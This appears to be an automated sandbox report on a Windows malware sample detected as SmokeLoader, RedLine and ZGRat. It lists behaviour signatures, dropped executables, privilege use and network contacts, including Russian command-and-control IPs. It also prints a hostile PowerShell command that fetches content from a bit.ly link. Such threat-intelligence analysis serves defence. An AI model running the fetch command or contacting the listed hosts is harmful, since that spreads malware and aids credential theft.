Analysis Overview
SHA256
de3b0cedbb0ce19fed2c76e7b1d160e8580644820ef5ef4d4e843379fd4c6289
Threat Level: Known bad
The file 0x0008000000014684-1626.dat was found to be: Known bad.
Malicious Activity Summary
SmokeLoader
Detect ZGRat V1
ZGRat
RedLine
Smokeloader family
RedLine payload
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Unsigned PE
Uses Task Scheduler COM API
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-18 22:32
Signatures
Smokeloader family
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-18 22:32
Reported
2023-12-18 22:35
Platform
win7-20231215-en
Max time kernel
33s
Max time network
36s
Signatures
RedLine
RedLine payload
SmokeLoader
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2852 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\909C.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
| PID 1256 wrote to memory of 2608 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AEF6.exe |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe
"C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe"
C:\Users\Admin\AppData\Local\Temp\909C.exe
C:\Users\Admin\AppData\Local\Temp\909C.exe
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
C:\Users\Admin\AppData\Local\Temp\AEF6.exe
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\tuc3.exe
"C:\Users\Admin\AppData\Local\Temp\tuc3.exe"
C:\Users\Admin\AppData\Local\Temp\BC7E.exe
C:\Users\Admin\AppData\Local\Temp\BC7E.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| DE | 140.82.121.3:443 | github.com | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2023-12-18 22:32
Reported
2023-12-18 22:35
Platform
win10v2004-20231215-en
Max time kernel
44s
Max time network
85s
Signatures
Detect ZGRat V1
RedLine
RedLine payload
SmokeLoader
ZGRat
Downloads MZ/PE file
Deletes itself
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\710.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1332 set thread context of 912 | N/A | C:\Users\Admin\AppData\Local\Temp\2055.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\710.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe
"C:\Users\Admin\AppData\Local\Temp\0x0008000000014684-1626.exe"
C:\Users\Admin\AppData\Local\Temp\710.exe
C:\Users\Admin\AppData\Local\Temp\710.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Users\Admin\AppData\Local\Temp\2055.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
C:\Users\Admin\AppData\Local\Temp\5560.exe
C:\Users\Admin\AppData\Local\Temp\5560.exe
C:\Users\Admin\AppData\Local\Temp\5D70.exe
C:\Users\Admin\AppData\Local\Temp\5D70.exe
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c install.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/3RmFzgo'"
C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | N/A | tcp |
| US | 8.8.8.8:53 | 0.181.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| RU | 185.215.113.68:80 | 185.215.113.68 | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 68.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.152.84:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.152.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| RU | 5.42.65.125:80 | 5.42.65.125 | tcp |
| RU | 77.105.132.87:17066 | N/A | tcp |
| US | 8.8.8.8:53 | 125.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.132.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp |
| N/A | 195.20.16.103:18305 | N/A | tcp |
| US | 8.8.8.8:53 | 103.16.20.195.in-addr.arpa | udp |
Files